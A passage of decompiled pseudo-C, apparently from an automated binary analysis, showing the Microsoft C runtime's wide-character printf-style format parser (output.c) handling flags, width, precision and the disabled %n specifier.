									 *(__ebp - 0x10) =  *(__ebp - 0x10) & 0x00008000;
									__eflags =  *(__ebp - 0x10) & 0x00008000;
									if(( *(__ebp - 0x10) & 0x00008000) == 0) {
										 *(__ebp - 0x10) =  *(__ebp - 0x10) & 0x00001000;
										__eflags =  *(__ebp - 0x10) & 0x00001000;
										if(( *(__ebp - 0x10) & 0x00001000) == 0) {
											__edx =  *(__ebp - 0x4a8);
											__eax =  *(__ebp - 0x4a4);
											__eax =  *(__ebp - 0x4a4) & 0x00000000;
											__eflags = __eax;
											 *(__ebp - 0x4a4) = __eax;
										}
									}
									__eflags =  *(__ebp - 0x30);
									if( *(__ebp - 0x30) >= 0) {
										 *(__ebp - 0x10) =  *(__ebp - 0x10) & 0xfffffff7;
										 *(__ebp - 0x10) =  *(__ebp - 0x10) & 0xfffffff7;
										__eflags =  *(__ebp - 0x30) - 0x200;
										if( *(__ebp - 0x30) > 0x200) {
											 *(__ebp - 0x30) = 0x200;
										}
									} else {
										 *(__ebp - 0x30) = 1;
									}
									 *(__ebp - 0x4a8) =  *(__ebp - 0x4a8) |  *(__ebp - 0x4a4);
									__eflags =  *(__ebp - 0x4a8) |  *(__ebp - 0x4a4);
									if(( *(__ebp - 0x4a8) |  *(__ebp - 0x4a4)) == 0) {
										 *(__ebp - 0x1c) = 0;
									}
									__eax = __ebp - 0x249;
									 *(__ebp - 4) = __ebp - 0x249;
									while(1) {
										L178:
										__ecx =  *(__ebp - 0x30);
										 *(__ebp - 0x30) =  *(__ebp - 0x30) - 1;
										 *(__ebp - 0x30) =  *(__ebp - 0x30) - 1;
										__eflags =  *(__ebp - 0x30);
										if( *(__ebp - 0x30) > 0) {
											goto L180;
										}
										L179:
										 *(__ebp - 0x4a8) =  *(__ebp - 0x4a8) |  *(__ebp - 0x4a4);
										__eflags =  *(__ebp - 0x4a8) |  *(__ebp - 0x4a4);
										if(( *(__ebp - 0x4a8) |  *(__ebp - 0x4a4)) == 0) {
											L183:
											__ebp - 0x249 = __ebp - 0x249 -  *(__ebp - 4);
											 *(__ebp - 0x24) = __ebp - 0x249 -  *(__ebp - 4);
											__ecx =  *(__ebp - 4);
											__ecx =  *(__ebp - 4) + 1;
											 *(__ebp - 4) = __ecx;
											 *(__ebp - 0x10) =  *(__ebp - 0x10) & 0x00000200;
											__eflags =  *(__ebp - 0x10) & 0x00000200;
											if(( *(__ebp - 0x10) & 0x00000200) == 0) {
												while(1) {
													L187:
													__eflags =  *(__ebp - 0x28);
													if( *(__ebp - 0x28) != 0) {
														goto L212;
													}
													L188:
													 *(__ebp - 0x10) =  *(__ebp - 0x10) & 0x00000040;
													__eflags =  *(__ebp - 0x10) & 0x00000040;
													if(( *(__ebp - 0x10) & 0x00000040) != 0) {
														 *(__ebp - 0x10) =  *(__ebp - 0x10) & 0x00000100;
														__eflags =  *(__ebp - 0x10) & 0x00000100;
														if(( *(__ebp - 0x10) & 0x00000100) == 0) {
															 *(__ebp - 0x10) =  *(__ebp - 0x10) & 0x00000001;
															__eflags =  *(__ebp - 0x10) & 0x00000001;
															if(( *(__ebp - 0x10) & 0x00000001) == 0) {
																 *(__ebp - 0x10) =  *(__ebp - 0x10) & 0x00000002;
																__eflags =  *(__ebp - 0x10) & 0x00000002;
																if(( *(__ebp - 0x10) & 0x00000002) != 0) {
																	__edx = 0x20;
																	 *(__ebp - 0x14) = __dx;
																	 *(__ebp - 0x1c) = 1;
																}
															} else {
																__eax = 0x2b;
																 *(__ebp - 0x14) = __ax;
																 *(__ebp - 0x1c) = 1;
															}
														} else {
															__ecx = 0x2d;
															 *(__ebp - 0x14) = __cx;
															 *(__ebp - 0x1c) = 1;
														}
													}
													 *(__ebp - 0x18) =  *(__ebp - 0x18) -  *(__ebp - 0x24);
													__eax =  *(__ebp - 0x18) -  *(__ebp - 0x24) -  *(__ebp - 0x1c);
													 *(__ebp - 0x4ac) =  *(__ebp - 0x18) -  *(__ebp - 0x24) -  *(__ebp - 0x1c);
													 *(__ebp - 0x10) =  *(__ebp - 0x10) & 0x0000000c;
													__eflags =  *(__ebp - 0x10) & 0x0000000c;
													if(( *(__ebp - 0x10) & 0x0000000c) == 0) {
														__edx = __ebp - 0x44c;
														__eax =  *(__ebp + 8);
														__ecx =  *(__ebp - 0x4ac);
														__eax = E00423F90(0x20,  *(__ebp - 0x4ac),  *(__ebp + 8), __ebp - 0x44c);
													}
													__edx = __ebp - 0x44c;
													__eax =  *(__ebp + 8);
													__ecx =  *(__ebp - 0x1c);
													__edx = __ebp - 0x14;
													E00423FD0( *(__ebp - 0x1c), __ebp - 0x14,  *(__ebp - 0x1c),  *(__ebp + 8), __ebp - 0x44c) =  *(__ebp - 0x10);
													__eax =  *(__ebp - 0x10) & 0x00000008;
													__eflags =  *(__ebp - 0x10) & 0x00000008;
													if(( *(__ebp - 0x10) & 0x00000008) != 0) {
														 *(__ebp - 0x10) =  *(__ebp - 0x10) & 0x00000004;
														__eflags =  *(__ebp - 0x10) & 0x00000004;
														if(( *(__ebp - 0x10) & 0x00000004) == 0) {
															__edx = __ebp - 0x44c;
															__eax =  *(__ebp + 8);
															__ecx =  *(__ebp - 0x4ac);
															__eax = E00423F90(0x30,  *(__ebp - 0x4ac),  *(__ebp + 8), __ebp - 0x44c);
														}
													}
													__eflags =  *(__ebp - 0xc);
													if( *(__ebp - 0xc) != 0) {
														L208:
														__edx = __ebp - 0x44c;
														__eax =  *(__ebp + 8);
														__ecx =  *(__ebp - 0x24);
														__edx =  *(__ebp - 4);
														__eax = E00423FD0(__ecx,  *(__ebp - 4), __ecx,  *(__ebp + 8), __ebp - 0x44c);
														goto L209;
													} else {
														L201:
														__eflags =  *(__ebp - 0x24);
														if( *(__ebp - 0x24) <= 0) {
															goto L208;
														}
														L202:
														__edx =  *(__ebp - 4);
														 *(__ebp - 0x4b0) =  *(__ebp - 4);
														__eax =  *(__ebp - 0x24);
														 *(__ebp - 0x4b4) =  *(__ebp - 0x24);
														while(1) {
															L203:
															__ecx =  *(__ebp - 0x4b4);
															 *(__ebp - 0x4b4) =  *(__ebp - 0x4b4) - 1;
															 *(__ebp - 0x4b4) =  *(__ebp - 0x4b4) - 1;
															__eflags = __ecx;
															if(__ecx <= 0) {
																break;
															}
															L204:
															__ecx = __ebp - 0x40;
															__eax = E004103A0(__ebp - 0x40);
															__ecx = __ebp - 0x40;
															E004103A0(__ebp - 0x40) =  *__eax;
															__ecx =  *(__ebp - 0x458 + 0xac);
															__edx =  *(__ebp - 0x4b0);
															__eax = __ebp - 0x458;
															 *(__ebp - 0x4b8) = E00420B60(__ebp - 0x458,  *(__ebp - 0x4b0),  *(__ebp - 0x458 + 0xac), __ebp - 0x458);
															__eflags =  *(__ebp - 0x4b8);
															if( *(__ebp - 0x4b8) > 0) {
																L206:
																__ecx = __ebp - 0x44c;
																__edx =  *(__ebp + 8);
																 *(__ebp - 0x458) & 0x0000ffff = E00423F30( *(__ebp - 0x458) & 0x0000ffff,  *(__ebp + 8), __ebp - 0x44c);
																 *(__ebp - 0x4b0) =  *(__ebp - 0x4b0) +  *(__ebp - 0x4b8);
																 *(__ebp - 0x4b0) =  *(__ebp - 0x4b0) +  *(__ebp - 0x4b8);
																continue;
															}
															L205:
															 *(__ebp - 0x44c) = 0xffffffff;
															break;
														}
														L207:
														L209:
														__eflags =  *(__ebp - 0x44c);
														if( *(__ebp - 0x44c) >= 0) {
															 *(__ebp - 0x10) =  *(__ebp - 0x10) & 0x00000004;
															__eflags =  *(__ebp - 0x10) & 0x00000004;
															if(( *(__ebp - 0x10) & 0x00000004) != 0) {
																__ecx = __ebp - 0x44c;
																__edx =  *(__ebp + 8);
																 *(__ebp - 0x4ac) = E00423F90(0x20,  *(__ebp - 0x4ac),  *(__ebp + 8), __ebp - 0x44c);
															}
														}
													}
													L212:
													__eflags =  *(__ebp - 0x20);
													if( *(__ebp - 0x20) != 0) {
														__ecx =  *(__ebp - 0x20);
														__eax = L0040F230( *(__ebp - 0x20), 2);
														 *(__ebp - 0x20) = 0;
													}
													while(1) {
														L214:
														 *(_t525 - 0x454) =  *((intOrPtr*)( *((intOrPtr*)(_t525 + 0xc))));
														_t502 =  *(_t525 - 0x454) & 0x0000ffff;
														 *((intOrPtr*)(_t525 + 0xc)) =  *((intOrPtr*)(_t525 + 0xc)) + 2;
														if(( *(_t525 - 0x454) & 0x0000ffff) == 0 ||  *(_t525 - 0x44c) < 0) {
															break;
														} else {
															if(( *(_t525 - 0x454) & 0x0000ffff) < 0x20 || ( *(_t525 - 0x454) & 0x0000ffff) > 0x78) {
																 *(_t525 - 0x4d8) = 0;
															} else {
																 *(_t525 - 0x4d8) =  *(( *(_t525 - 0x454) & 0x0000ffff) + L"h != _T(\'\\0\'))") & 0xf;
															}
														}
														L7:
														 *(_t525 - 0x450) =  *(_t525 - 0x4d8);
														_t519 =  *(_t525 - 0x450) * 9;
														_t490 =  *(_t525 - 0x45c);
														_t510 = ( *(_t519 + _t490 + 0x4081a0) & 0x000000ff) >> 4;
														 *(_t525 - 0x45c) = ( *(_t519 + _t490 + 0x4081a0) & 0x000000ff) >> 4;
														if( *(_t525 - 0x45c) != 8) {
															L16:
															 *(_t525 - 0x4e0) =  *(_t525 - 0x45c);
															__eflags =  *(_t525 - 0x4e0) - 7;
															if( *(_t525 - 0x4e0) > 7) {
																continue;
															}
															L17:
															switch( *((intOrPtr*)( *(_t525 - 0x4e0) * 4 +  &M00423E24))) {
																case 0:
																	L18:
																	 *(_t525 - 0xc) = 1;
																	E00423F30( *(_t525 - 0x454) & 0x0000ffff,  *((intOrPtr*)(_t525 + 8)), _t525 - 0x44c);
																	_t527 = _t527 + 0xc;
																	goto L214;
																case 1:
																	L19:
																	 *(__ebp - 0x2c) = 0;
																	__ecx =  *(__ebp - 0x2c);
																	 *(__ebp - 0x28) = __ecx;
																	__edx =  *(__ebp - 0x28);
																	 *(__ebp - 0x18) =  *(__ebp - 0x28);
																	__eax =  *(__ebp - 0x18);
																	 *(__ebp - 0x1c) =  *(__ebp - 0x18);
																	 *(__ebp - 0x10) = 0;
																	 *(__ebp - 0x30) = 0xffffffff;
																	 *(__ebp - 0xc) = 0;
																	goto L214;
																case 2:
																	L20:
																	__ecx =  *(__ebp - 0x454) & 0x0000ffff;
																	 *(__ebp - 0x4e4) = __ecx;
																	 *(__ebp - 0x4e4) =  *(__ebp - 0x4e4) - 0x20;
																	 *(__ebp - 0x4e4) =  *(__ebp - 0x4e4) - 0x20;
																	__eflags =  *(__ebp - 0x4e4) - 0x10;
																	if( *(__ebp - 0x4e4) > 0x10) {
																		goto L27;
																	}
																	L21:
																	_t57 =  *(__ebp - 0x4e4) + 0x423e5c; // 0x498d04
																	__ecx =  *_t57 & 0x000000ff;
																	switch( *((intOrPtr*)(__ecx * 4 +  &M00423E44))) {
																		case 0:
																			goto L24;
																		case 1:
																			goto L25;
																		case 2:
																			goto L23;
																		case 3:
																			goto L22;
																		case 4:
																			goto L26;
																		case 5:
																			goto L27;
																	}
																case 3:
																	L28:
																	__ecx =  *(__ebp - 0x454) & 0x0000ffff;
																	__eflags = ( *(__ebp - 0x454) & 0x0000ffff) - 0x2a;
																	if(( *(__ebp - 0x454) & 0x0000ffff) != 0x2a) {
																		__edx =  *(__ebp - 0x18);
																		__edx =  *(__ebp - 0x18) * 0xa;
																		__eflags = __edx;
																		_t81 = ( *(__ebp - 0x454) & 0x0000ffff) - 0x30; // -48
																		__ecx = __edx + _t81;
																		 *(__ebp - 0x18) = __ecx;
																	} else {
																		__edx = __ebp + 0x14;
																		 *(__ebp - 0x18) = E0041F270(__ebp + 0x14);
																		__eflags =  *(__ebp - 0x18);
																		if( *(__ebp - 0x18) < 0) {
																			__eax =  *(__ebp - 0x10);
																			__eax =  *(__ebp - 0x10) | 0x00000004;
																			__eflags = __eax;
																			 *(__ebp - 0x10) = __eax;
																			__ecx =  *(__ebp - 0x18);
																			__ecx =  ~( *(__ebp - 0x18));
																			 *(__ebp - 0x18) = __ecx;
																		}
																	}
																	L33:
																	goto L214;
																case 4:
																	L34:
																	 *(__ebp - 0x30) = 0;
																	goto L214;
																case 5:
																	L35:
																	__edx =  *(__ebp - 0x454) & 0x0000ffff;
																	__eflags = ( *(__ebp - 0x454) & 0x0000ffff) - 0x2a;
																	if(( *(__ebp - 0x454) & 0x0000ffff) != 0x2a) {
																		__ecx =  *(__ebp - 0x30);
																		__ecx =  *(__ebp - 0x30) * 0xa;
																		__eflags = __ecx;
																		_t92 = ( *(__ebp - 0x454) & 0x0000ffff) - 0x30; // -48
																		__eax = __ecx + _t92;
																		 *(__ebp - 0x30) = __ecx + _t92;
																	} else {
																		__eax = __ebp + 0x14;
																		 *(__ebp - 0x30) = E0041F270(__ebp + 0x14);
																		__eflags =  *(__ebp - 0x30);
																		if( *(__ebp - 0x30) < 0) {
																			 *(__ebp - 0x30) = 0xffffffff;
																		}
																	}
																	goto L214;
																case 6:
																	L41:
																	__ecx =  *(__ebp - 0x454) & 0x0000ffff;
																	 *(__ebp - 0x4e8) = __ecx;
																	 *(__ebp - 0x4e8) =  *(__ebp - 0x4e8) - 0x49;
																	 *(__ebp - 0x4e8) =  *(__ebp - 0x4e8) - 0x49;
																	__eflags =  *(__ebp - 0x4e8) - 0x2e;
																	if( *(__ebp - 0x4e8) > 0x2e) {
																		L64:
																		goto L214;
																	}
																	L42:
																	_t100 =  *(__ebp - 0x4e8) + 0x423e84; // 0x36919003
																	__ecx =  *_t100 & 0x000000ff;
																	switch( *((intOrPtr*)(__ecx * 4 +  &M00423E70))) {
																		case 0:
																			L47:
																			__ecx =  *(__ebp + 0xc);
																			__edx =  *( *(__ebp + 0xc)) & 0x0000ffff;
																			__eflags = ( *( *(__ebp + 0xc)) & 0x0000ffff) - 0x36;
																			if(( *( *(__ebp + 0xc)) & 0x0000ffff) != 0x36) {
																				L50:
																				__ecx =  *(__ebp + 0xc);
																				__edx =  *( *(__ebp + 0xc)) & 0x0000ffff;
																				__eflags = ( *( *(__ebp + 0xc)) & 0x0000ffff) - 0x33;
																				if(( *( *(__ebp + 0xc)) & 0x0000ffff) != 0x33) {
																					L53:
																					__ecx =  *(__ebp + 0xc);
																					__edx =  *__ecx & 0x0000ffff;
																					__eflags = ( *__ecx & 0x0000ffff) - 0x64;
																					if(( *__ecx & 0x0000ffff) == 0x64) {
																						L59:
																						L61:
																						goto L64;
																					}
																					L54:
																					__eax =  *(__ebp + 0xc);
																					__ecx =  *( *(__ebp + 0xc)) & 0x0000ffff;
																					__eflags = __ecx - 0x69;
																					if(__ecx == 0x69) {
																						goto L59;
																					}
																					L55:
																					__edx =  *(__ebp + 0xc);
																					__eax =  *( *(__ebp + 0xc)) & 0x0000ffff;
																					__eflags = ( *( *(__ebp + 0xc)) & 0x0000ffff) - 0x6f;
																					if(( *( *(__ebp + 0xc)) & 0x0000ffff) == 0x6f) {
																						goto L59;
																					}
																					L56:
																					__ecx =  *(__ebp + 0xc);
																					__edx =  *__ecx & 0x0000ffff;
																					__eflags = ( *__ecx & 0x0000ffff) - 0x75;
																					if(( *__ecx & 0x0000ffff) == 0x75) {
																						goto L59;
																					}
																					L57:
																					__eax =  *(__ebp + 0xc);
																					__ecx =  *( *(__ebp + 0xc)) & 0x0000ffff;
																					__eflags = __ecx - 0x78;
																					if(__ecx == 0x78) {
																						goto L59;
																					}
																					L58:
																					__edx =  *(__ebp + 0xc);
																					__eax =  *( *(__ebp + 0xc)) & 0x0000ffff;
																					__eflags = ( *( *(__ebp + 0xc)) & 0x0000ffff) - 0x58;
																					if(( *( *(__ebp + 0xc)) & 0x0000ffff) != 0x58) {
																						 *(__ebp - 0x45c) = 0;
																						goto L18;
																					}
																					goto L59;
																				}
																				L51:
																				__eax =  *(__ebp + 0xc);
																				__ecx =  *( *(__ebp + 0xc) + 2) & 0x0000ffff;
																				__eflags = __ecx - 0x32;
																				if(__ecx != 0x32) {
																					goto L53;
																				} else {
																					 *(__ebp + 0xc) =  *(__ebp + 0xc) + 4;
																					 *(__ebp + 0xc) =  *(__ebp + 0xc) + 4;
																					 *(__ebp - 0x10) =  *(__ebp - 0x10) & 0xffff7fff;
																					 *(__ebp - 0x10) =  *(__ebp - 0x10) & 0xffff7fff;
																					goto L61;
																				}
																			}
																			L48:
																			__eax =  *(__ebp + 0xc);
																			__ecx =  *( *(__ebp + 0xc) + 2) & 0x0000ffff;
																			__eflags = __ecx - 0x34;
																			if(__ecx != 0x34) {
																				goto L50;
																			} else {
																				 *(__ebp + 0xc) =  *(__ebp + 0xc) + 4;
																				 *(__ebp + 0xc) =  *(__ebp + 0xc) + 4;
																				 *(__ebp - 0x10) =  *(__ebp - 0x10) | 0x00008000;
																				 *(__ebp - 0x10) =  *(__ebp - 0x10) | 0x00008000;
																				goto L61;
																			}
																		case 1:
																			L62:
																			__ecx =  *(__ebp - 0x10);
																			__ecx =  *(__ebp - 0x10) | 0x00000020;
																			 *(__ebp - 0x10) = __ecx;
																			goto L64;
																		case 2:
																			L43:
																			__edx =  *(__ebp + 0xc);
																			__eax =  *( *(__ebp + 0xc)) & 0x0000ffff;
																			__eflags = ( *( *(__ebp + 0xc)) & 0x0000ffff) - 0x6c;
																			if(( *( *(__ebp + 0xc)) & 0x0000ffff) != 0x6c) {
																				__eax =  *(__ebp - 0x10);
																				__eax =  *(__ebp - 0x10) | 0x00000010;
																				__eflags = __eax;
																				 *(__ebp - 0x10) = __eax;
																			} else {
																				__ecx =  *(__ebp + 0xc);
																				__ecx =  *(__ebp + 0xc) + 2;
																				 *(__ebp + 0xc) = __ecx;
																				 *(__ebp - 0x10) =  *(__ebp - 0x10) | 0x00001000;
																				 *(__ebp - 0x10) =  *(__ebp - 0x10) | 0x00001000;
																			}
																			goto L64;
																		case 3:
																			L63:
																			__edx =  *(__ebp - 0x10);
																			__edx =  *(__ebp - 0x10) | 0x00000800;
																			__eflags = __edx;
																			 *(__ebp - 0x10) = __edx;
																			goto L64;
																		case 4:
																			goto L64;
																	}
																case 7:
																	L65:
																	__eax =  *(__ebp - 0x454) & 0x0000ffff;
																	 *(__ebp - 0x4ec) =  *(__ebp - 0x454) & 0x0000ffff;
																	__ecx =  *(__ebp - 0x4ec);
																	__ecx =  *(__ebp - 0x4ec) - 0x41;
																	 *(__ebp - 0x4ec) = __ecx;
																	__eflags =  *(__ebp - 0x4ec) - 0x37;
																	if( *(__ebp - 0x4ec) > 0x37) {
																		while(1) {
																			L187:
																			__eflags =  *(__ebp - 0x28);
																			if( *(__ebp - 0x28) != 0) {
																				goto L212;
																			}
																			goto L188;
																		}
																	}
																	L66:
																	_t141 =  *(__ebp - 0x4ec) + 0x423ef0; // 0xcccccc0d
																	__eax =  *_t141 & 0x000000ff;
																	switch( *((intOrPtr*)(( *_t141 & 0x000000ff) * 4 +  &M00423EB4))) {
																		case 0:
																			L120:
																			 *(__ebp - 0x2c) = 1;
																			 *(__ebp - 0x454) & 0x0000ffff = ( *(__ebp - 0x454) & 0x0000ffff) + 0x20;
																			__eflags = ( *(__ebp - 0x454) & 0x0000ffff) + 0x20;
																			 *(__ebp - 0x454) = __ax;
																			goto L121;
																		case 1:
																			L67:
																			 *(__ebp - 0x10) =  *(__ebp - 0x10) & 0x00000830;
																			__eflags =  *(__ebp - 0x10) & 0x00000830;
																			if(( *(__ebp - 0x10) & 0x00000830) == 0) {
																				__edx =  *(__ebp - 0x10);
																				__edx =  *(__ebp - 0x10) | 0x00000020;
																				__eflags = __edx;
																				 *(__ebp - 0x10) = __edx;
																			}
																			goto L69;
																		case 2:
																			L82:
																			 *(__ebp - 0x10) =  *(__ebp - 0x10) & 0x00000830;
																			__eflags =  *(__ebp - 0x10) & 0x00000830;
																			if(( *(__ebp - 0x10) & 0x00000830) == 0) {
																				__ecx =  *(__ebp - 0x10);
																				__ecx =  *(__ebp - 0x10) | 0x00000020;
																				__eflags = __ecx;
																				 *(__ebp - 0x10) = __ecx;
																			}
																			goto L84;
																		case 3:
																			L143:
																			 *(__ebp - 0x460) = 7;
																			goto L145;
																		case 4:
																			L75:
																			__eax = __ebp + 0x14;
																			 *(__ebp - 0x474) = E0041F270(__ebp + 0x14);
																			__eflags =  *(__ebp - 0x474);
																			if( *(__ebp - 0x474) == 0) {
																				L77:
																				__edx =  *0x4bc060; // 0x408114
																				 *(__ebp - 4) = __edx;
																				__eax =  *(__ebp - 4);
																				 *(__ebp - 0x24) = E00410910( *(__ebp - 4));
																				L81:
																				goto L187;
																			}
																			L76:
																			__ecx =  *(__ebp - 0x474);
																			__eflags =  *(__ecx + 4);
																			if( *(__ecx + 4) != 0) {
																				 *(__ebp - 0x10) =  *(__ebp - 0x10) & 0x00000800;
																				__eflags =  *(__ebp - 0x10) & 0x00000800;
																				if(( *(__ebp - 0x10) & 0x00000800) == 0) {
																					 *(__ebp - 0xc) = 0;
																					__edx =  *(__ebp - 0x474);
																					__eax =  *(__edx + 4);
																					 *(__ebp - 4) =  *(__edx + 4);
																					__ecx =  *(__ebp - 0x474);
																					__edx =  *__ecx;
																					 *(__ebp - 0x24) =  *__ecx;
																				} else {
																					__edx =  *(__ebp - 0x474);
																					__eax =  *(__edx + 4);
																					 *(__ebp - 4) =  *(__edx + 4);
																					__ecx =  *(__ebp - 0x474);
																					__eax =  *__ecx;
																					asm("cdq");
																					 *__ecx - __edx =  *__ecx - __edx >> 1;
																					 *(__ebp - 0x24) =  *__ecx - __edx >> 1;
																					 *(__ebp - 0xc) = 1;
																				}
																				goto L81;
																			}
																			goto L77;
																		case 5:
																			L121:
																			 *(__ebp - 0x10) =  *(__ebp - 0x10) | 0x00000040;
																			 *(__ebp - 0x10) =  *(__ebp - 0x10) | 0x00000040;
																			__edx = __ebp - 0x448;
																			 *(__ebp - 4) = __ebp - 0x448;
																			 *(__ebp - 0x44) = 0x200;
																			__eflags =  *(__ebp - 0x30);
																			if( *(__ebp - 0x30) >= 0) {
																				L123:
																				__eflags =  *(__ebp - 0x30);
																				if( *(__ebp - 0x30) != 0) {
																					L126:
																					__eflags =  *(__ebp - 0x30) - 0x200;
																					if( *(__ebp - 0x30) > 0x200) {
																						 *(__ebp - 0x30) = 0x200;
																					}
																					L128:
																					__eflags =  *(__ebp - 0x30) - 0xa3;
																					if( *(__ebp - 0x30) > 0xa3) {
																						__ecx =  *(__ebp - 0x30);
																						__ecx =  *(__ebp - 0x30) + 0x15d;
																						 *(__ebp - 0x20) = L0040E5B0( *(__ebp - 0x30) + 0x15d,  *(__ebp - 0x30) + 0x15d, 2, "f:\\dd\\vctools\\crt_bld\\self_x86\\crt\\src\\output.c", 0x6da);
																						__eflags =  *(__ebp - 0x20);
																						if( *(__ebp - 0x20) == 0) {
																							 *(__ebp - 0x30) = 0xa3;
																						} else {
																							__edx =  *(__ebp - 0x20);
																							 *(__ebp - 4) =  *(__ebp - 0x20);
																							 *(__ebp - 0x30) =  *(__ebp - 0x30) + 0x15d;
																							 *(__ebp - 0x44) =  *(__ebp - 0x30) + 0x15d;
																						}
																					}
																					 *(__ebp + 0x14) =  *(__ebp + 0x14) + 8;
																					 *(__ebp + 0x14) =  *(__ebp + 0x14) + 8;
																					__edx =  *(__ebp + 0x14);
																					__eax =  *(__edx - 8);
																					__ecx =  *(__edx - 4);
																					 *(__ebp - 0x490) =  *(__edx - 8);
																					 *(__ebp - 0x48c) =  *(__edx - 4);
																					__ecx = __ebp - 0x40;
																					_push(E004103A0(__ebp - 0x40));
																					__edx =  *(__ebp - 0x2c);
																					_push( *(__ebp - 0x2c));
																					__eax =  *(__ebp - 0x30);
																					_push( *(__ebp - 0x30));
																					__ecx =  *(__ebp - 0x454);
																					_push( *(__ebp - 0x454));
																					__edx =  *(__ebp - 0x44);
																					_push( *(__ebp - 0x44));
																					__eax =  *(__ebp - 4);
																					_push( *(__ebp - 4));
																					__ecx = __ebp - 0x490;
																					_push(__ebp - 0x490);
																					__edx =  *0x4bb808; // 0x776010b9
																					E00411D00(__edx) =  *__eax();
																					__esp = __esp + 0x1c;
																					 *(__ebp - 0x10) =  *(__ebp - 0x10) & 0x00000080;
																					__eflags =  *(__ebp - 0x10) & 0x00000080;
																					if(( *(__ebp - 0x10) & 0x00000080) != 0) {
																						__eflags =  *(__ebp - 0x30);
																						if( *(__ebp - 0x30) == 0) {
																							__ecx = __ebp - 0x40;
																							_push(E004103A0(__ebp - 0x40));
																							__ecx =  *(__ebp - 4);
																							_push( *(__ebp - 4));
																							__edx =  *0x4bb814; // 0x776010b9
																							E00411D00(__edx) =  *__eax();
																							__esp = __esp + 8;
																						}
																					}
																					__eax =  *(__ebp - 0x454) & 0x0000ffff;
																					__eflags = ( *(__ebp - 0x454) & 0x0000ffff) - 0x67;
																					if(( *(__ebp - 0x454) & 0x0000ffff) == 0x67) {
																						 *(__ebp - 0x10) =  *(__ebp - 0x10) & 0x00000080;
																						__eflags =  *(__ebp - 0x10) & 0x00000080;
																						if(( *(__ebp - 0x10) & 0x00000080) == 0) {
																							__ecx = __ebp - 0x40;
																							_push(E004103A0(__ebp - 0x40));
																							__edx =  *(__ebp - 4);
																							_push( *(__ebp - 4));
																							__eax =  *0x4bb810; // 0x776010b9
																							__eax =  *__eax();
																							__esp = __esp + 8;
																						}
																					}
																					__ecx =  *(__ebp - 4);
																					__edx =  *( *(__ebp - 4));
																					__eflags =  *( *(__ebp - 4)) - 0x2d;
																					if( *( *(__ebp - 4)) == 0x2d) {
																						 *(__ebp - 0x10) =  *(__ebp - 0x10) | 0x00000100;
																						 *(__ebp - 0x10) =  *(__ebp - 0x10) | 0x00000100;
																						__ecx =  *(__ebp - 4);
																						__ecx =  *(__ebp - 4) + 1;
																						__eflags = __ecx;
																						 *(__ebp - 4) = __ecx;
																					}
																					__edx =  *(__ebp - 4);
																					 *(__ebp - 0x24) = E00410910( *(__ebp - 4));
																					do {
																						L187:
																						__eflags =  *(__ebp - 0x28);
																						if( *(__ebp - 0x28) != 0) {
																							goto L212;
																						}
																						goto L188;
																					} while ( *(__ebp - 0x4ec) > 0x37);
																					goto L66;
																				}
																				L124:
																				__eax =  *(__ebp - 0x454) & 0x0000ffff;
																				__eflags = ( *(__ebp - 0x454) & 0x0000ffff) - 0x67;
																				if(( *(__ebp - 0x454) & 0x0000ffff) != 0x67) {
																					goto L126;
																				}
																				L125:
																				 *(__ebp - 0x30) = 1;
																				goto L128;
																			}
																			L122:
																			 *(__ebp - 0x30) = 6;
																			goto L128;
																		case 6:
																			L69:
																			 *(__ebp - 0xc) = 1;
																			__ebp + 0x14 = E0041F270(__ebp + 0x14);
																			 *(__ebp - 0x458) = __ax;
																			__ecx =  *(__ebp - 0x10);
																			__ecx =  *(__ebp - 0x10) & 0x00000020;
																			__eflags = __ecx;
																			if(__ecx == 0) {
																				__cx =  *(__ebp - 0x458);
																				 *(__ebp - 0x448) = __cx;
																			} else {
																				 *(__ebp - 0x458) & 0x0000ffff =  *(__ebp - 0x458) & 0xff;
																				 *(__ebp - 0x470) = __dl;
																				 *((char*)(__ebp - 0x46f)) = 0;
																				__ecx = __ebp - 0x40;
																				__eax = E004103A0(__ebp - 0x40);
																				__ecx = __ebp - 0x40;
																				E004103A0(__ebp - 0x40) =  *__eax;
																				__ecx =  *(__ebp - 0x448 + 0xac);
																				__edx = __ebp - 0x470;
																				__eax = __ebp - 0x448;
																				__eax = E00420B60(__ebp - 0x448, __ebp - 0x470,  *(__ebp - 0x448 + 0xac), __ebp - 0x448);
																				__eflags = __eax;
																				if(__eax < 0) {
																					 *(__ebp - 0x28) = 1;
																				}
																			}
																			__edx = __ebp - 0x448;
																			 *(__ebp - 4) = __ebp - 0x448;
																			 *(__ebp - 0x24) = 1;
																			while(1) {
																				L187:
																				__eflags =  *(__ebp - 0x28);
																				if( *(__ebp - 0x28) != 0) {
																					goto L212;
																				}
																				goto L188;
																			}
																		case 7:
																			L141:
																			 *(__ebp - 0x10) =  *(__ebp - 0x10) | 0x00000040;
																			 *(__ebp - 0x10) =  *(__ebp - 0x10) | 0x00000040;
																			 *(__ebp - 8) = 0xa;
																			goto L150;
																		case 8:
																			L106:
																			__eax = __ebp + 0x14;
																			 *(__ebp - 0x484) = E0041F270(__ebp + 0x14);
																			__eax = E00424120();
																			__eflags = __eax;
																			if(__eax != 0) {
																				L116:
																				__ecx =  *(__ebp - 0x10);
																				__ecx =  *(__ebp - 0x10) & 0x00000020;
																				__eflags = __ecx;
																				if(__ecx == 0) {
																					__ecx =  *(__ebp - 0x484);
																					__edx =  *(__ebp - 0x44c);
																					 *__ecx =  *(__ebp - 0x44c);
																				} else {
																					__edx =  *(__ebp - 0x484);
																					__ax =  *(__ebp - 0x44c);
																					 *( *(__ebp - 0x484)) = __ax;
																				}
																				 *(__ebp - 0x28) = 1;
																				while(1) {
																					L187:
																					__eflags =  *(__ebp - 0x28);
																					if( *(__ebp - 0x28) != 0) {
																						goto L212;
																					}
																					goto L188;
																				}
																			}
																			L107:
																			__ecx = 0;
																			__eflags = 0;
																			if(0 == 0) {
																				 *(__ebp - 0x4f4) = 0;
																			} else {
																				 *(__ebp - 0x4f4) = 1;
																			}
																			__edx =  *(__ebp - 0x4f4);
																			 *(__ebp - 0x488) =  *(__ebp - 0x4f4);
																			__eflags =  *(__ebp - 0x488);
																			if( *(__ebp - 0x488) == 0) {
																				_push(L"(\"\'n\' format specifier disabled\", 0)");
																				_push(0);
																				_push(0x695);
																				_push(L"f:\\dd\\vctools\\crt_bld\\self_x86\\crt\\src\\output.c");
																				_push(2);
																				__eax = L0040C820();
																				__esp = __esp + 0x14;
																				__eflags = __eax - 1;
																				if(__eax == 1) {
																					asm("int3");
																				}
																			}
																			__eflags =  *(__ebp - 0x488);
																			if( *(__ebp - 0x488) != 0) {
																				L115:
																				while(1) {
																					L187:
